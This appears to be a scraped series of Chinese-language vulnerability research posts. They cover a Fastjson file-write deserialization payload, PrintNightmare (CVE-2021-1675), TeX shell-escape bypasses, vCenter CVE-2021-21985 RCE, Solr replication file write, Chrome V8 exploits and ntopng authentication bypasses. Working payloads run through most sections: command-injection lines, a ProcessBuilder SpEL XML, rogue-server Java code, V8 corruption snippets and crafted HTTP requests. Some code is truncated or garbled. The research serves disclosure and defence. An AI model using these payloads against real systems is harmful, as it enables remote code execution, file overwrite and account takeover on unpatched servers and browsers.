        String payload = String.format("{\n" +
                "  \"@type\":\"java.lang.AutoCloseable\",\n" +
                "  \"@type\":\"\",\n" +
                "  \"delegate\":{\n" +
                "    \"@type\":\"\",\n" +
                "    \"input\":{\n" +
                "      \"@type\": \"org.apache.commons.codec.binary.Base64InputStream\",\n" +
                "      \"in\":{\n" +
                "        \"@type\":\"\",\n" +
                "        \"charset\":\"utf-8\",\n" +
                "        \"bufferSize\": 1024,\n" +
                "        \"s\":{\"@type\":\"java.lang.String\"\"%1$s\"\n" +
                "      },\n" +
                "      \"doEncode\":false,\n" +
                "      \"lineLength\":1024,\n" +
                "      \"lineSeparator\":\"5ZWKCg==\",\n" +
                "      \"decodingPolicy\":0\n" +
                "    },\n" +
                "    \"branch\":{\n" +
                "      \"@type\":\"org.eclipse.core.internal.localstore.SafeFileOutputStream\",\n" +
                "      \"targetPath\":\"%2$s\"\n" +
                "    },\n" +
                "    \"closeBranch\":true\n" +
                "  },\n" +
                "  \"include\":true,\n" +
                "  \"boms\":[{\n" +
                "                  \"@type\": \"\",\n" +
                "                  \"charsetName\": \"UTF-8\",\n" +
                "                  \"bytes\":" +"%3$s\n" +
                "                }],\n" +
                "  \"x\":{\"$ref\":\"$.bOM\"}\n" +
                "}",base64_so_content, "D://java//Fastjson_All//fastjson_debug//fastjson_68_payload_test_attck//",Arrays.toString(big_bom_buffer_bytes));
//        System.out.println(payload);


    public static byte[] readFileInBytesToString(String filePath) {
        final int readArraySizePerRead = 4096;
        File file = new File(filePath);
        ArrayList<Byte> bytes = new ArrayList<>();
        try {
            if (file.exists()) {
                DataInputStream isr = new DataInputStream(new FileInputStream(
                byte[] tempchars = new byte[readArraySizePerRead];
                int charsReadCount = 0;

                while ((charsReadCount = != -1) {
                    for(int i = 0 ; i < charsReadCount ; i++){
                        bytes.add (tempchars[i]);
        } catch (IOException e) {
            // TODO Auto-generated catch block

        return toPrimitives(bytes.toArray(new Byte[0]));

    static byte[] toPrimitives(Byte[] oBytes) {
        byte[] bytes = new byte[oBytes.length];

        for (int i = 0; i < oBytes.length; i++) {
            bytes[i] = oBytes[i];

        return bytes;



五、参考链接 & 致谢

*感谢voidfyoo、浅蓝、*RicterZ 在Fastjson Poc方面帮助

感谢Swing、Beichen 在二进制方面帮助


对打印机服务漏洞 CVE-2021-1675 代码执行的验证过程

By: yyjb
30 June 2021 at 10:09





根据API文档,RpcAddPrinterDriverEx API用于在打印机服务器上安装打印机驱动;第三个参数为dwFileCopyFlags,指定了服务器在拷贝驱动文件时的行为。文档给出了标志的可能值,结合补丁,我们发现了这样一个标志:APD_INSTALL_WARNED_DRIVER(0x8000),此标志允许服务器安装警告的打印机驱动,也就是说,如果在flag中设置了APD_INSTALL_WARNED_DRIVER,那么我们可以无视警告安装打印机驱动。这刚好是微软补丁试图限制的标志位。



1. 检查驱动签名

2. 建立驱动文件列表

3. 检查驱动兼容性

4. 拷贝驱动文件





CreateInternalDriverFileArray()函数根据文件操作标志来决定是否检查spool驱动目录。如果a5 flag被标志为False,驱动加载函数只会检查用户目录中是否包含要拷贝的驱动文件;否则,函数会尝试到spool驱动目录寻找目标驱动,在本地提权场景下,这将导致列表建立失败。





















PrintNightmare 0day POC的补充说明

通过最近一两天其他研究人员的证明,目前公开的cube0x0/PrintNightmare poc可以对最新的补丁起作用。鉴于此,我们后续验证了这个原因。





TeX 安全模式绕过研究

By: RicterZ
6 June 2021 at 07:06


  • 2021/03/08 - 提交漏洞至 TeX 官方;
  • 2021/03/27 - 漏洞修复,安全版本:TeX Live 2021;
  • 2021/06/06 - 漏洞分析公开。

I. Tex 安全限制概述

TeX 提供了 \write18 原语以执行命令。为了提高安全性,TexLive 的配置文件(texmf.cnf)提供了配置项(shell_escape、shell_escape_commands)去配置 \write18 能否执行命令以及允许执行的命令列表。

其中 shell_escape 有三种配置值,分别为:

  • f:不允许执行任何命令
  • t:允许执行任何命令
  • p:支持执行白名单内的命令(默认)


kpsewhich --var-value shell_escape_commands

shell_escape 配置值可以通过如下命令查询:

kpsewhich --var-value shell_escape

本文涉及的 CVE 如下:没 advisory 懒得申请了。

II. 挖掘思路

TeX 提供了一个默认的白名单命令列表,如若在调用过程中,这些命令出现安全问题,则会导致 TeX 本身在调用命令的时候出现相同的安全问题。


III. 在 *nix 下的利用方式

通过针对命令的深入挖掘,发现白名单内的 repstopdf 命令存在安全问题,通过精心构造参数可以执行任意系统命令。

repstopdf 意为 restricted epstopdf,epstopdf 是一个 Perl 开发的脚本程序,可以将 eps 文件转化为 pdf 文件。repstopdf 强制开启了 epstopdf 的 --safer 参数,同时禁用了 --gsopt/--gsopts/--gscmd 等 GhostScript 相关的危险参数,以防止在 TeX 中调用此命令出现安全问题。repstopdf 调用方式如下:

repstopdf [options] [epsfile [pdffile.pdf]]

repstopdf 会调用 GhostScript 去生成 pdf 文件(具体调用参数可以用过 strace 命令进行跟踪),其中传入的 epsfile 参数会成为 GhostScript 的 -sOutputFile= 选项的参数。

通过查阅 GhostScript 的文档可知,GhostScript 的此项参数支持管道操作。当我们传入文件名为:|id 时,GhostScript 会执行 id 命令。于是我们可以构造 repstopdf 的参数实现任意的命令执行操作,不受前文所提及的限制条件限制。利用方式如下所示:

repstopdf '|id #'

在 TeX 内的利用方式为:

\write18{repstopdf "|id #"}

IV. 在 Windows 下的利用方式

Windows 平台下,白名单内存在的是 epstopdf 而非 repstopdf,且相关参数选项与 *nix 平台下不相同,但仍旧存在 --gsopt 选项。利用此选项可以控制调用 GhostScript 时的参数。

此参数只支持设定调用 GhostScript 时的参数选项。参考 GhostScript 的文档,指定参数 -sOutputFile 及其他相关参数即可。利用方式为:

epstopdf 1.tex "--gsopt=-sOutputFile=%pipe%calc" "--gsopt=-sDEVICE=pdfwrite" "--gsopt=-"

V. LuaLaTeX 的安全问题

LuaLaTex 内置了 Lua 解释器,可以在编译时执行 Lua 代码,原语为:\directlua。LuaLaTeX 支持调用系统命令,但是同样地受到 shell_escape 的限制。如在受限(f)模式下,不允许执行任意命令;默认情况下只允许执行白名单内的命令。由于可以调用白名单内的命令,LuaLaTeX 同样可以利用 III、IV 内描述的方式进行利用,在此不做进一步赘述。

LuaLaTeX 的 Lua 解释器支持如下风险功能:

  • 命令执行(io.popen 等函数)
  • 文件操作(lfs 库函数)
  • 环境变量设置(os.setenv)
  • 内置了部分自研库(fontloader)

1. 环境变量劫持导致命令执行

通过修改 PATH 环境变量,可以达到劫持白名单内命令的效果。PATH 环境变量指定了可执行文件所在位置的目录路径,当在终端或者命令行输入命令时,系统会依次查找 PATH 变量中指定的目录路径,如果该命令存在与目录中,则执行此命令(。

将 PATH 变量修改为攻击者可控的目录,并在该目录下创建与白名单内命令同名的恶意二进制文件后,攻击者通过正常系统功能调用白名单内的命令后,可以达到任意命令执行的效果。

2. fontloader 库安全问题

fontloader 库存在典型的命令注入问题,问题代码如下:

// texk/web2c/luatexdir/luafontloader/fontforge/fontforge/splinefont.c
char *Decompress(char *name, int compression) {
    char *dir = getenv("TMPDIR");
    char buf[1500];
    char *tmpfile;

    if ( dir==NULL ) dir = P_tmpdir;
    tmpfile = galloc(strlen(dir)+strlen(GFileNameTail(name))+2);
    *strrchr(tmpfile,'.') = '\0';
#if defined( _NO_SNPRINTF ) || defined( __VMS )
    sprintf( buf, "%s < %s > %s", compressors[compression].decomp, name, tmpfile );
    snprintf( buf, sizeof(buf), "%s < %s > %s", compressors[compression].decomp, name, tmpfile );
    if ( system(buf)==0 )
return( tmpfile );
return( NULL );


ff_open -> ReadSplineFont -> _ReadSplineFont -> Decompress -> system

通过 Lua 调用 函数即可触发。此方式可以在受限(f)模式下执行命令。

VI. DVI 的安全问题

DVI(Device independent file)是一种二进制文件格式,可以由 TeX 生成。在 TeX 中,可以利用 \special 原语嵌入图形。TeX 内置了 DVI 查看器,其中 *nix 平台下为 xdvi 命令,Windows 平台下通常为 YAP(Yet Another Previewer)。

1. xdvi 命令的安全问题

xdvi 在处理超链接时,调用了系统命令启动新的 xdvi,存在典型的命令注入问题。问题代码如下:

// texk/xdvik/hypertex.c
launch_xdvi(const char *filename, const char *anchor_name)
#define ARG_LEN 32
    int i = 0;
    const char *argv[ARG_LEN];
    char *shrink_arg = NULL;

    ASSERT(filename != NULL, "filename argument to launch_xdvi() mustn't be NULL");

    argv[i++] = kpse_invocation_name;
    argv[i++] = "-name";
    argv[i++] = "xdvi";

    /* start the new instance with the same debug flags as the current instance */
    if (globals.debug != 0) {
	argv[i++] = "-debug";
	argv[i++] = resource.debug_arg;
    if (anchor_name != NULL) {
	argv[i++] = "-anchorposition";
	argv[i++] = anchor_name;

    argv[i++] = "-s";
    shrink_arg = XMALLOC(shrink_arg, LENGTH_OF_INT + 1);
    sprintf(shrink_arg, "%d", currwin.shrinkfactor);
    argv[i++] = shrink_arg;

    argv[i++] = filename; /* FIXME */
    argv[i++] = NULL;
	    execvp(argv[0], (char **)argv);

2. YAP 安全问题

YAP 在处理 DVI 内置的 PostScripts 脚本时调用了 GhostScript,且未开启安全模式(-dSAFER),可以直接利用内嵌的 GhostScript 进行命令执行。

VII. 漏洞利用

TeX 底层出现安全问题时,可以影响基于 TeX 的相关在线平台、TeX 编辑器以及命令行。下面以 MacOS 下比较知名的 Texpad 进行演示:

VIII. 参考文章

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析

By: RicterZ
5 June 2021 at 00:17
vSphere vCenter Server 的 vsphere-ui 基于 OSGi 框架,包含上百个 bundle。前几日爆出的任意文件写入漏洞即为 vrops 相关的 bundle 出现的问题。在针对其他 bundle 审计的过程中,发现 h5-vsan 相关的 bundle 提供了一些 API 端点,并且未经过授权即可访问。通过进一步的利用,发现其中某个端点存在安全问题,可以执行任意 Spring Bean 的方法,从而导致命令执行。
CVE-2021-21985 vCenter Server 远程代码执行漏洞分析


  • 2021/04/13 - 发现漏洞并实现 RCE;
  • 2021/04/16 - 提交漏洞至 VMware 官方并获得回复;
  • 2021/05/26 - VMware 发布漏洞 Advisory(VMSA-2021-0010);
  • 2021/06/02 - Exploit 公开(from 随风's blog);
  • 2021/06/05 - 本文公开。

0x01. 漏洞分析

存在漏洞的 API 端点如下:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 1. 存在漏洞的 Controller

首先在请求路径中获取 Bean 名称或者类名和方法名称,接着从 POST 数据中获取 methodInput 列表作为方法参数,接着进入 invokeService 方法:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 2. invokeService 方法

invokeServer 先获取了 Bean 实例,接着获取该实例的方法列表,比对方法名和方法参数长度后,将用户传入的参数进行了一个简单的反序列化后利用进行了调用。Bean 非常多(根据版本不同数量有微量变化),如图所示:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 3. Bean 列表

其中不乏存在危险方法、可以利用的 Bean,需要跟进其方法实现进行排查。本文中的 PoC 所使用的 Bean 是 vmodlContext,对应的类是 com.vmware.vim.vmomi.core.types.impl.VmodContextImpl,其中的 loadVmodlPackage 方法代码如下:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 4. loadVmodlPackage 方法

注意到 loadVmodlPackage 会调用 SpringContextLoader 进行加载,vmodPackage 可控。

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 5. 调用 SpringContextLoader

最终会调用到 ClassPathXmlApplicationContext 的构造方法。ClassPathXmlApplicationContext 可以指定一个 XML 文件路径,Spring 会解析 XML 的内容,造成 SpEL 注入,从而实现执行任意代码。

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 6. ClassPathXmlApplicationContext

需要注意的是,在 SpringContextLoadergetContextFileNameForPackage 会将路径中的 . 替换为 /,所以无法指定一个正常的 IPv4 地址,但是可以利用数字型 IP 绕过:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 7. 调用 loadVmodlPackages 方法并传入 URL

XML 文件内容及攻击效果如下:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 8. XML 文件内容及攻击效果

0x02. 不出网利用(6.7 / 7.0)

若要利用此漏洞本质上需要获取一个 XML 文件的内容,而 Java 的 URL 并不支持 data 协议,那么需要返回内容可控的 SSRF 或者文件上传漏洞。这里利用的是返回内容可控的 SSRF 漏洞。漏洞位于 vSAN Health 组件中的

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 9. 文件内容

这里存在一个 SSRF 漏洞,使用的是 Python 的 urlopen 函数进行请求,接着将返回内容在内存中进行解压,并且匹配文件名为 .*offline_bundle.* 的内容并进行返回。Python 的 urlopen 支持 data 协议,所以可以构造一个压缩包并 Base64 编码,构造 data 协议的 URL:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 10. 利用 SSRF 返回可控文件内容

在利用的过程中,将 IP 地址替换为 localhost 即可防止 . 被替换。由于这个端点在 6.5 版本的 vSAN Health 不存在,所以无法在 6.5 版本上不出网利用。

现在虽然不用进行外网请求,但是仍然无法获取命令回显。通过查看 Bean 列表,发现存在名为 systemProperties 的 Bean。同时这个 Bean 也存在方法可以获取属性内容:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 11. 调用 systemProperties 的方法

所以在执行 SpEL 时,可以将命令暂存到 systemProperties 中,然后利用 getProperty 方法获取回显。最终的 context.xml 内容为:

<beans xmlns=""
    <bean id="pb" class="java.lang.ProcessBuilder">
            <value><![CDATA[ ls -la /  2>&1 ]]></value>
    <bean id="is" class="">
    <bean id="br" class="">
    <bean id="collectors" class=""></bean>
    <bean id="system" class="java.lang.System">
        <property name="whatever" value="#{ system.setProperty(&quot;output&quot;, br.lines().collect(collectors.joining(&quot;\n&quot;))) }"/>

最终利用需要两个 HTTP 请求进行。第一个请求利用 h5-vsan 组件的 SSRF 去请求本地的 vSAN Health 组件,触发第二个 SSRF 漏洞从而返回内容可控的 XML 文件内容,XML 文件会执行命令并存入 System Properties 中,第二个请求调用 systemProperties Bean 的 getProperty 方法获取输出。最终攻击效果如下:

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析
图 12. 不出网攻击效果

0x03. 技术总结

CVE-2021-21985 vCenter Server 远程代码执行漏洞分析

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

By: RicterZ
2 June 2021 at 09:10
Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

0x01. TL; DR

事情要从 Skay 的 SSRF 漏洞(CVE-2021-27905)说起。正巧后续的工作中遇到了 Solr,我就接着这个漏洞进行了进一步的分析。漏洞原因是在于 Solr 主从复制(Replication)时,可以传入任意 URL,而 Solr 会针对此 URL 进行请求。

说起主从复制,那么对于 Redis 主从复制漏洞比较熟悉的人会知道,可以利用主从复制的功能实现任意文件写入,那么 Solr 是否会存在这个问题呢?通过进一步的分析,我发现这个漏洞岂止于 SSRF,简直就是 Redis Replication 文件写入的翻版,通过构造合法的返回,可以以 Solr 应用的权限实现任意文件写。

对于低版本 Solr,可以通过写入 JSP 文件获取 Webshell,对于高版本 Solr,则需要结合用户权限,写入 crontab 或者 authorized_keys 文件利用。

0x02. CVE-2021-27905

Solr 的 ReplicationHandler 在传入 command 为 fetchindex 时,会请求传入的 masterUrl,漏洞点如下:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

SSRF 漏洞到这里就结束了。那么后续呢,如果是正常的主从复制,又会经历怎么样的过程?

0x03. Replication 代码分析

我们继续跟进 doFetch 方法,发现会调用到 fetchLatestIndex 方法:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

在此方法中,首先去请求目标 URL 的 Solr 实例,接着对于返回值的 indexversiongeneration 进行判断:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

如果全部合法(参加下图的 if 条件),则继续请求服务,获取文件列表:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

文件列表包含filelistconfFilestlogFiles 三部分,如果目标 Solr 实例返回的文件列表不为空,则将文件列表中的内容添加到 filesToDownload 中。这里 Solr 是调用的 command 是 filelist

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

获取下载文件的列表后,接着 Solr 会进行文件的下载操作,按照 filesToDownloadtlogFilesToDownloadconfFilesToDownload 的顺序进行下载。

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

我们随意跟进某个下载方法,比如 downloadConfFiles

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

可以发现,saveAs 变量是取于 files 的某个属性,而最终会直接创建一个 File 对象:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

也就是说,如果 file 的 alias 或者 name 可控,则可以利用 ../ 进行目录遍历,造成任意文件写入的效果。再回到 fetchFileList 查看,可以发现,filesToDownload 是完全从目标 Solr 实例的返回中获取的,也就是说是完全可控的。

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

0x04. Exploit 编写

类似于 Redis Replication 的 Exploit,我们也需要编写一个 Rogue Solr Server,需要实现几种 commands,包括 indexversionfilelist 以及 filecontent。部分代码如下:

if (data.contains("command=indexversion")) {
    response = SolrResponse.makeIndexResponse().toByteArray();
} else if (data.contains("command=filelist")) {
    response = SolrResponse.makeFileListResponse().toByteArray();
} else if (data.contains("command=filecontent")) {
    response = SolrResponse.makeFileContentResponse().toByteArray();
} else {
    response = "Hello World".getBytes();

t.getResponseHeaders().add("Content-Type", "application/octet-stream");
t.sendResponseHeaders(200, response.length);
OutputStream os = t.getResponseBody();


public static ByteArrayOutputStream makeFileListResponse() throws IOException {
    ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
    JavaBinCodec codec = new JavaBinCodec(null);

    NamedList<Object> values = new SimpleOrderedMap<>();
    NamedList<Object> headers = new SimpleOrderedMap<>();
    headers.add("status", 0);
    headers.add("QTime", 1);

    values.add("responseHeader", headers);

    HashMap<String, Object> file = new HashMap<>();
    file.put("size", new Long(String.valueOf((new File(FILE_NAME)).length())));
    file.put("lastmodified", new Long("123456"));
    file.put("name", DIST_FILE);

    ArrayList<HashMap<String, Object>> fileList = new ArrayList<>();

    HashMap<String, Object> file2 = new HashMap<>();
    file2.put("size", new Long(String.valueOf((new File(FILE_NAME)).length())));
    file2.put("lastmodified", new Long("123456"));
    file2.put("name", DIST_FILE);

    ArrayList<HashMap<String, Object>> fileList2 = new ArrayList<>();

    values.add("confFiles", fileList);
    values.add("filelist", fileList2);

    codec.marshal(values, outputStream);
    return outputStream;

其中 DIST_FILE 为攻击者传入的参数,比如传入 ../../../../../../../../tmp/pwn.txt,而 FILE_NAME 是本地要写入的文件的路径。攻击效果如下:

Apache Solr 8.8.1 SSRF to Arbitrary File Write Vulnerability

Chromium V8 JavaScript引擎远程代码执行漏洞分析讨论

By: frust
15 April 2021 at 07:35


2021年4月13日,安全研究人员Rajvardhan Agarwal在推特公布了本周第一个远程代码执行(RCE)的0Day漏洞,该漏洞可在当前版本(89.0.4389.114)的谷歌Chrome浏览器上成功触发。Agarwal公布的漏洞,是基于Chromium内核的浏览器中V8 JavaScript引擎的远程代码执行漏洞,同时还发布了该漏洞的PoC

2021年4月14日,360高级攻防实验室安全研究员frust公布了本周第二个Chromium 0day(Issue 1195777)以及Chrome 89.0.4389.114的poc视频验证。该漏洞会影响当前最新版本的Google Chrome 90.0.4430.72,以及Microsoft Edge和其他可能基于Chromium的浏览器。



目前四个漏洞issue 1126249issue 1150649、issue 1196683、issue 1195777的exp均使用同一绕过缓解措施手法(截至文章发布,后两个issue尚未公开),具体细节可参考文章

基本思路是创建一个数组,然后调用shift函数构造length为-1的数组,从而实现相对任意地址读写。issue 1196683中关键利用代码如下所示。

function foo(a) {
	if(x==-1) x = 0;
	var arr = new Array(x);//---------------------->构造length为-1数组

issue 1195777中关键利用代码如下所示:

function foo(a) {
    let x = -1;
    if (a) x = 0xFFFFFFFF;
    var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));//---------------------->构造length为-1数组
    let local_arr = Array(2);

参考issue 1126249issue 1150649中关键poc代码如下所示,其缓解绕过可能使用同一方法。

function jit_func(a) {
    v5568 = Math.sign(v19229) < 0|0|0 ? 0 : v5568;
    let v51206 = new Array(v5568);

function jit_func(a, b) {
  v56971 = 0xfffffffe/2 + 1 - Math.sign(v921312 -(-0x1)|6328);
  if (b) {
    v56971 = 0;
  v129341 = new Array(Math.sign(0 - Math.sign(v56971)));
  v4951241 = {};


frust在youtube给出了Chrome89.0.4389.114的poc视频验证;经测试最新版Chrome 90.0.4430.72仍旧存在该漏洞。



class LeakArrayBuffer extends ArrayBuffer {
        constructor(size) {
            this.slot = 0xb33f;//进行地址泄露
function foo(a) {
        let x = -1;
        if (a) x = 0xFFFFFFFF;
        var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));//构造长度为-1的数组
        let local_arr = Array(2);
        local_arr[0] = 5.1;//4014666666666666
        let buff = new LeakArrayBuffer(0x1000);//
        arr[0] = 0x1122;//修改数组长度
        return [arr, local_arr, buff];
    for (var i = 0; i < 0x10000; ++i)
    gc(); gc();
    [corrput_arr, rwarr, corrupt_buff] = foo(true);

通过代码Array(Math.sign(0 - Math.max(0, x, -1)))创建一个length为-1的数组,然后使用LeakArrayBuffer构造内存布局,将相对读写布局成绝对读写。



 (corrupt_buffer_ptr_low & 0xffff0000) - ((corrupt_buffer_ptr_low & 0xffff0000) % 0x40000) + 0x40000;


同时结合0x02步骤中实现的相对读写和对象泄露,可实现绝对地址读写。@r4j0x00在issue 1196683中构造length为-1数组后,则通过伪造对象实现任意地址读写。






漏洞修复和应用代码修复之间的窗口期为攻击者提供了可乘之机。Chrome尚且如此,其他依赖v8等组件的APP更不必说,使用1 day甚至 N day即可实现0 day效果。这也为我们敲响警钟,不仅仅是安全研究,作为应用开发者,也应当关注组件漏洞并及时修复,避免攻击者趁虚而入。



ntopng 流量分析工具多个漏洞分析

By: RicterZ
24 March 2021 at 03:37

0x00. TL;DR

ntopng 是一套开源的网络流量监控工具,提供基于 Web 界面的实时网络流量监控。支持跨平台,包括 Windows、Linux 以及 MacOS。ntopng 使用 C++ 语言开发,其绝大部分 Web 逻辑使用 lua 开发。

在针对 ntopng 的源码进行审计的过程中,笔者发现了 ntopng 存在多个漏洞,包括一个权限绕过漏洞、一个 SSRF 漏洞和多个其他安全问题,接着组合利用这些问题成功实现了部分版本的命令执行利用和管理员 Cookie 伪造。

比较有趣的是,利用的过程涉及到 SSDP 协议、gopher scheme 和奇偶数,还有极佳的运气成分。ntopng 已经针对这些漏洞放出补丁,并在 4.2 版本进行修复。涉及漏洞的 CVE 如下:

  • CVE-2021-28073
  • CVE-2021-28074

0x01. 部分权限绕过 (全版本)

ntopng 的 Web 界面由 Lua 开发,对于 HTTP 请求的处理、认证相关的逻辑由后端 C++ 负责,文件为 HTTPserver.cpp。对于一个 HTTP 请求来说,ntopng 的主要处理逻辑代码都在 handle_lua_request 函数中。其 HTTP 处理逻辑流程如下:

  1. 检测是不是某些特殊路径,如果是直接返回相关逻辑结束函数;
  2. 检测是不是白名单路径,如果是则储存在 whitelisted 变量中;
  3. 检测是否是静态资源,通过判断路径最后的扩展名,如果不是则进入认证逻辑,认证不通过结束函数;
  4. 检测是否路径以某些特殊路径开头,如果是则调用 Lua 解释器,逻辑交由 Lua 层;
  5. 以上全部通过则判断为静态文件,函数返回,交由 mongoose 处理静态文件。

针对一个非白名单内的 lua 文件,是无法在通过认证之前到达的,因为无法通过判断是否是静态文件的相关逻辑。同时为了使我们传入的路径进入调用 LuaEngine::handle_script_request 我们传入的路径需要以 /lua/ 或者 /plugins/ 开头,以静态文件扩展名结尾,比如 .css 或者 .js

// HTTPserver.cpp
if(!isStaticResourceUrl(request_info, len)) {

if((strncmp(request_info->uri, "/lua/", 5) == 0)
 || (strcmp(request_info->uri, "/metrics") == 0)
 || (strncmp(request_info->uri, "/plugins/", 9) == 0)
 || (strcmp(request_info->uri, "/") == 0)) {

进入 if 语句后,ntopng 声明了一个 大小为 255 的字符串数组 来储存用户请求的文件路径。并针对以非 .lua 扩展名结尾的路径后补充了 .lua,接着调用 stat 函数判断此路径是否存在。如果存在则调用 LuaEngine::handle_script_request 来进行处理。

// HTTPserver.cpp
/* Lua Script */
char path[255] = { 0 }, uri[2048];
struct stat buf;
bool found;

if(strlen(path) > 4 && strncmp(&path[strlen(path) - 4], ".lua", 4))
    snprintf(&path[strlen(path)], sizeof(path) - strlen(path) - 1, "%s", 

found = ((stat(path, &buf) == 0) && (S_ISREG(buf.st_mode))) ? true : false;

if(found) {
    l = new LuaEngine(NULL);
    l->handle_script_request(conn, request_info, path, &attack_attempt, username,
                             group, csrf, localuser);

ntopng 调用 snprintf 将用户请求的 URI 写入到 path 数组中,而 snprintf 会在字符串结尾添加 \0。由于 path 数组长度有限,即使用户传入超过 255 个字符的路径,也只会写入前 254 个字符,我们可以通过填充 ./ 来构造一个长度超过 255 但是合法的路径,并利用长度限制来截断后面的 .css.lua,即可绕过 ntopng 的认证以访问部分 Lua 文件。

目前有两个问题,一个是为什么只能用 ./ 填充,另外一个是为什么说是“部分 Lua 文件”。

第一个问题,在 thrid-party/mongoose/mongoose.c 中,进行路径处理之前会调用下面的函数去除重复的 /以及 .,导致我们只能用 ./ 来填充。

void remove_double_dots_and_double_slashes(char *s) {
    char *p = s;

    while (*s != '\0') {
        *p++ = *s++;
        if (s[-1] == '/' || s[-1] == '\\') {
            // Skip all following slashes, backslashes and double-dots
            while (s[0] != '\0') {
                if (s[0] == '/' || s[0] == '\\') {
                } else if (s[0] == '.' && s[1] == '.') {
                    s += 2;
                } else {
    *p = '\0';

说部分 Lua 文件的原因为,由于我们只能利用两个字符 ./ 来进行路径填充,。那么针对前缀长度为偶数的路径,我们只能访问路径长度为偶数的路径,反之亦然。因为一个偶数加一个偶数要想成为偶数必然需要再加一个偶数。也就是说,我们需要:

len("/path/to/ntopng/lua/") + len("./") * padding + len("path/to/file") = 255 - 1

0x02. 全局权限绕过 (版本 4.1.x-4.3.x)

其实大多数 ntopng 的安装路径都是偶数(/usr/share/ntopng/scripts/lua/),那么我们需要一个合适的 gadgets 来使我们执行任意 lua 文件。通过对 lua 文件的审计,我发现 modules/widgets_utils.lua内存在一个合适的 gadgets:

// modules/widgets_utils.lua
function widgets_utils.generate_response(widget, params)
   local ds = datasources_utils.get(widget.ds_hash)
   local dirs = ntop.getDirs()
   package.path = dirs.installdir .. "/scripts/lua/datasources/?.lua;" .. package.path

   -- Remove trailer .lua from the origin
   local origin = ds.origin:gsub("%.lua", "")

   -- io.write("Executing "..origin..".lua\n")

   -- Call the origin to return
   local response = require(origin)

调用入口在 widgets/widget.lua,很幸运,这个文件名长度为偶数。通过阅读代码逻辑可知,我们需要在edit_widgets.lua 创建一个 widget,而创建 widget 有需要存在一个 datasource,在 edit_datasources.lua 创建。而这两个文件的文件名长度全部为偶数,所以我们可以利用请求这几个文件,从而实现任意文件包含的操作,从而绕过 ntopng 的认证。

0x03. Admin 密码重置利用 (版本 2.x)

利用 0x01 的认证绕过,请求 admin/password_reset.lua 即可更改管理员的密码。

GET /lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f
password=123&new_password=123&old_password=0&username=admin HTTP/1.1
Cookie: user=admin
Connection: close

0x04. 利用主机发现功能伪造 Session (版本 4.1.x-4.3.x)

ntopng 的主机发现功能利用了 SSDP(Simple Service Discovery Protocol)协议去发现内网中的设备。

SSDP 协议进行主机发现的流程如下所示:

|      SSDP Client     +<--------+
+-----------+----------+         |
            |                    |
        M-SEARCH          HTTP/1.1 200 OK
            v                    |
+-----------+----------+         |
| |         |
+---+--------------+---+         |
    |              |             |
    v              v             |
+---+-----+  +-----+---+         |
| DEVICES |  | DEVICES |         |
+---+-----+  +-----+---+         |
    |              |             |

SSDP 协议在 UDP 层传输,协议格式基于 HTTPU(在 UDP 端口上传输 HTTP 协议)。SSDP 客户端向多播地址239.255.255.250 的 1900 端口发送 M-SEARCH 的请求,局域网中加入此多播地址的设备接收到请求后,向客户端回复一个 HTTP/1.1 200 OK,在 HTTP Headers 里有与设备相关的信息。其中存在一个 Location 字段,一般指向设备的描述文件。

// modules/discover_utils.lua
function discover.discover2table(interface_name, recache)
    local ssdp = interface.discoverHosts(3)
    ssdp = analyzeSSDP(ssdp)

local function analyzeSSDP(ssdp)
   local rsp = {}

   for url,host in pairs(ssdp) do
      local hresp = ntop.httpGet(url, "", "", 3 --[[ seconds ]])

在 discover_utils.lua 中,Lua 会调用 discoverHosts 函数获取 SSDP 发现的设备信息,然后在analyzeSSDP 函数中请求 Location 头所指向的 URL。那么这里显然存在一个 SSRF 漏洞。ntop.httpGet最终调用到的方法为 Utils::httpGetPost,而这个方法又使用了 cURL 进行请求。

// Utils.cpp
bool Utils::httpGetPost(lua_State* vm, char *url, char *username,
            char *password, int timeout,
            bool return_content,
            bool use_cookie_authentication,
            HTTPTranferStats *stats, const char *form_data,
            char *write_fname, bool follow_redirects, int ip_version) {
  CURL *curl;
  FILE *out_f = NULL;
  bool ret = true;

  curl = curl_easy_init();

众所周知,cURL 是支持 gopher:// 协议的。ntopng 使用 Redis 储存 Session 的相关信息,那么利用SSRF 攻击本地的 Redis 即可设置 Session,最终实现认证绕过。

discover.discover2table 的调用入口在 discover.lua,也是一个偶数长度的文件名。于是通过请求此文件触发主机发现功能,同时启动一个 SSDP Server 去回复 ntopng 发出的 M-SEARCH 请求,并将 Location设置为如下 payload:


最终通过设置 Cookie 为 session=ntop 来通过认证。

0x05. 利用主机发现功能实现 RCE (版本 3.8-4.0)

原理同 0x04,利用点在 assistant_test.lua 中,需要设置 ntopng.prefs.telegram_chat_id 以及 ntopng.prefs.telegram_bot_token,利用 SSRF 写入 Redis 即可。

local function send_text_telegram(text) 
  local chat_id, bot_token = ntop.getCache("ntopng.prefs.telegram_chat_id"), 

